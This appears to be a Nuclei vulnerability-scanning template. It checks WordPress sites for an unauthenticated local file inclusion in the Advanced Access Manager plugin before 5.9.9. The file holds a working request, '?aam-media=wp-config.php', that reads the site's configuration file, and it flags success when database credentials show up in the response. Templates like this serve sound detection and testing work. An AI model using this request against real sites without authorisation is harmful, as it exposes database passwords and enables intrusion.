nuclei-templates/vulnerabilities/wordpress/advanced-access-manager-lfi...

30 lines
855 B
YAML
Raw Normal View History

id: advanced-access-manager-lfi
info:
name: Advanced Access Manager < 5.9.9 - Unauthenticated Local File Inclusion
author: 0x_Akoko
severity: high
description: The Advanced Access Manager WordPress plugin, versions before 5.9.9, allowed reading arbitrary files. This way one can download the wp-config.php file and get access to the database, which is publicly reachable on many servers.
reference:
- https://wpscan.com/vulnerability/9873
- https://id.wordpress.org/plugins/advanced-access-manager/
tags: wordpress,wp-plugin,lfi
requests:
- method: GET
path:
- '{{BaseURL}}/?aam-media=wp-config.php'
matchers-condition: and
matchers:
- type: word
words:
- "DB_NAME"
- "DB_PASSWORD"
part: body
condition: and
- type: status
status:
- 200